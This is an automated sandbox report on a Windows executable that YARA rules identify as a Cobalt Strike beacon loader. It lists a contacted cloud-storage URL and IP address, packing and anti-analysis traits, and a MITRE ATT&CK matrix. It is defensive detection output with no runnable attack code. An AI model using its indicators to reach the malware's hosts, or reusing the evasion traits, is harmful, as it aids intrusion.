          Source: 31#U544a.exe, 00000000.00000003.1690727037.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690624284.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690360896.000001912B09A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leganse.oss-cn-hangzhou.aliyuncs.com/update.json;(
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownHTTPS traffic detected: 118.31.219.225:443 -> 192.168.2.4:49730 version: TLS 1.2

          System Summary

          barindex
          Source: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7D39EB NtDeviceIoControlFile,RtlNtStatusToDosError,0_2_00007FF71A7D39EB
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7D4165 NtCreateFile,RtlNtStatusToDosError,CreateIoCompletionPort,SetFileCompletionNotificationModes,CloseHandle,0_2_00007FF71A7D4165
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7D39EB: NtDeviceIoControlFile,RtlNtStatusToDosError,0_2_00007FF71A7D39EB
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A809BBB0_2_00007FF71A809BBB
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A81FB520_2_00007FF71A81FB52
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A81173C0_2_00007FF71A81173C
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7A36110_2_00007FF71A7A3611
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7F0C670_2_00007FF71A7F0C67
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7E29FC0_2_00007FF71A7E29FC
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7F8A580_2_00007FF71A7F8A58
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8205070_2_00007FF71A820507
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7EA4510_2_00007FF71A7EA451
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A80C1DD0_2_00007FF71A80C1DD
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7E48D80_2_00007FF71A7E48D8
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8166960_2_00007FF71A816696
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A825BA00_2_00007FF71A825BA0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A82BBD00_2_00007FF71A82BBD0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A84DBF90_2_00007FF71A84DBF9
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A821B500_2_00007FF71A821B50
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A831B4F0_2_00007FF71A831B4F
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7F1C4A0_2_00007FF71A7F1C4A
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8339B00_2_00007FF71A8339B0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A819A100_2_00007FF71A819A10
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8379900_2_00007FF71A837990
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7ABAD00_2_00007FF71A7ABAD0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A841AC00_2_00007FF71A841AC0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A855A4F0_2_00007FF71A855A4F
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8520B70_2_00007FF71A8520B7
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8460F00_2_00007FF71A8460F0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7B00800_2_00007FF71A7B0080
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7A7DCC0_2_00007FF71A7A7DCC
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7A7E090_2_00007FF71A7A7E09
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A823D500_2_00007FF71A823D50
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A839EC00_2_00007FF71A839EC0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7A1E710_2_00007FF71A7A1E71
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7A73DB0_2_00007FF71A7A73DB
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8313E00_2_00007FF71A8313E0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8413700_2_00007FF71A841370
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8274C00_2_00007FF71A8274C0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7D51C70_2_00007FF71A7D51C7
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7D52DF0_2_00007FF71A7D52DF
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7C121E0_2_00007FF71A7C121E
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7DB2510_2_00007FF71A7DB251
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A83B2700_2_00007FF71A83B270
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7A580B0_2_00007FF71A7A580B
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7CF72A0_2_00007FF71A7CF72A
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7A976D0_2_00007FF71A7A976D
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7A77950_2_00007FF71A7A7795
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8397800_2_00007FF71A839780
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A80381E0_2_00007FF71A80381E
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7A16A50_2_00007FF71A7A16A5
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7C96900_2_00007FF71A7C9690
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A83EBC00_2_00007FF71A83EBC0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A84CBF50_2_00007FF71A84CBF5
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7B6B6A0_2_00007FF71A7B6B6A
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A83AB900_2_00007FF71A83AB90
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A80CCE10_2_00007FF71A80CCE1
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A83CD000_2_00007FF71A83CD00
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7B49B20_2_00007FF71A7B49B2
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7FE9F70_2_00007FF71A7FE9F7
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A83AAC00_2_00007FF71A83AAC0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A826A600_2_00007FF71A826A60
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8470100_2_00007FF71A847010
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A830F300_2_00007FF71A830F30
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7B10F00_2_00007FF71A7B10F0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A85D0D90_2_00007FF71A85D0D9
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8391100_2_00007FF71A839110
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8350800_2_00007FF71A835080
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7FCDDE0_2_00007FF71A7FCDDE
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7C6F110_2_00007FF71A7C6F11
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7A2E480_2_00007FF71A7A2E48
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A824E880_2_00007FF71A824E88
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A80E3360_2_00007FF71A80E336
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A83E4F00_2_00007FF71A83E4F0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A82C1D00_2_00007FF71A82C1D0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7D01F20_2_00007FF71A7D01F2
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A83020F0_2_00007FF71A83020F
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A80E2AE0_2_00007FF71A80E2AE
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A80E2CE0_2_00007FF71A80E2CE
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A81C2C00_2_00007FF71A81C2C0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7BC2200_2_00007FF71A7BC220
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A85677E0_2_00007FF71A85677E
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A84E90B0_2_00007FF71A84E90B
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8485C00_2_00007FF71A8485C0
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7CE5E20_2_00007FF71A7CE5E2
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A84C5700_2_00007FF71A84C570
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8425600_2_00007FF71A842560
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8445800_2_00007FF71A844580
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8105860_2_00007FF71A810586
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A83C6300_2_00007FF71A83C630
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_000001912B78FA700_2_000001912B78FA70
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_000001912B79289C0_2_000001912B79289C
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_000001912B7870740_2_000001912B787074
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_000001912B7916880_2_000001912B791688
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_000001912B791D4C0_2_000001912B791D4C
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: String function: 00007FF71A7AEF70 appears 51 times
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: String function: 00007FF71A7AC0C0 appears 62 times
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: String function: 00007FF71A7ADE90 appears 65 times
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: String function: 00007FF71A7AC510 appears 142 times
          Source: 31#U544a.exe, 00000000.00000000.1649326774.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewinhlp32.exe2 vs 31#U544a.exe
          Source: 31#U544a.exe, 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewinhlp32.exe2 vs 31#U544a.exe
          Source: 31#U544a.exeBinary or memory string: OriginalFilenamewinhlp32.exe2 vs 31#U544a.exe
          Source: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: classification engineClassification label: mal100.troj.evad.winEXE@1/2@1/2
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A823D50 memset,FormatMessageW,memcpy,GetLastError,0_2_00007FF71A823D50
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8460F0 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,GetLastError,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,CreateToolhelp32Snapshot,memset,Module32FirstW,Module32NextW,UnmapViewOfFile,CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,RtlVirtualUnwind,0_2_00007FF71A8460F0
          Source: C:\Users\user\Desktop\31#U544a.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 31#U544a.exeReversingLabs: Detection: 13%
          Source: 31#U544a.exeVirustotal: Detection: 26%
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: cryptnet.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: 31#U544a.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: 31#U544a.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

          Data Obfuscation

          barindex
          Source: C:\Users\user\Desktop\31#U544a.exeUnpacked PE file: 0.2.31#U544a.exe.7ff71a7a0000.0.unpack .dosx:EW;.fish:EW;.rsrc:EW; vs .dosx:ER;.fish:ER;.rsrc:EW;
          Source: initial sampleStatic PE information: section where entry point is pointing to: .fish
          Source: 31#U544a.exeStatic PE information: section name: .dosx
          Source: 31#U544a.exeStatic PE information: section name: .fish
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_3_000001912B274080 push ecx; iretd 0_3_000001912B274083
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_3_000001912B273EE4 push ecx; iretd 0_3_000001912B273EE7
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_3_000001912B273B6A push ecx; iretd 0_3_000001912B273B8F
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_3_000001912B274050 push ecx; iretd 0_3_000001912B274053
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_3_000001912B27044E pushad ; iretd 0_3_000001912B27044F
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_000001912B77935D push edi; iretd 0_2_000001912B77935E
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_000001912B79B158 push ebp; iretd 0_2_000001912B79B159
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_000001912B79B12F push ebp; iretd 0_2_000001912B79B130
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_000001912B77B91C pushad ; retf 0_2_000001912B77B91D
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_000001912B79B10F push ebp; iretd 0_2_000001912B79B110
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_000001912B77971E push cs; retf 0_2_000001912B77971F
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_000001912B77AD58 push ebp; iretd 0_2_000001912B77AD59
          Source: 31#U544a.exeStatic PE information: section name: .fish entropy: 7.90743698825191
          Source: C:\Users\user\Desktop\31#U544a.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7A1D00 rdtsc 0_2_00007FF71A7A1D00
          Source: C:\Users\user\Desktop\31#U544a.exe TID: 4488Thread sleep time: -330000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeLast function: Thread delayed
          Source: 31#U544a.exe, 00000000.00000003.1953841512.000001912B0FB000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000002.2905242341.000001912B6BF000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1746035165.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000002.2904739603.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1746035165.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: 31#U544a.exe, 00000000.00000003.1690687457.000001912B04A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690360896.000001912B048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7A1D00 rdtsc 0_2_00007FF71A7A1D00
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A7A1190 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,0_2_00007FF71A7A1190
          Source: C:\Users\user\Desktop\31#U544a.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\31#U544a.exeNtCreateFile: Indirect: 0x7FF71A7D41CBJump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeNtDeviceIoControlFile: Indirect: 0x7FF71A7D3BC3Jump to behavior
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_000001912B785368 GetUserNameA,strrchr,_snprintf,0_2_000001912B785368
          Source: C:\Users\user\Desktop\31#U544a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2905522054.000001912B7A1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 31#U544a.exe PID: 6260, type: MEMORYSTR
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A8209AE bind,0_2_00007FF71A8209AE
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A820507 WSASocketW,WSAGetLastError,WSASocketW,SetHandleInformation,GetLastError,bind,WSAGetLastError,closesocket,WSAGetLastError,0_2_00007FF71A820507
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          DLL Side-Loading
          1
          Abuse Elevation Control Mechanism
          1
          Virtualization/Sandbox Evasion
          OS Credential Dumping1
          Query Registry
          Remote Services1
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Disable or Modify Tools
          LSASS Memory11
          Security Software Discovery
          Remote Desktop ProtocolData from Removable Media1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information
          Security Account Manager1
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Abuse Elevation Control Mechanism
          NTDS1
          Process Discovery
          Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
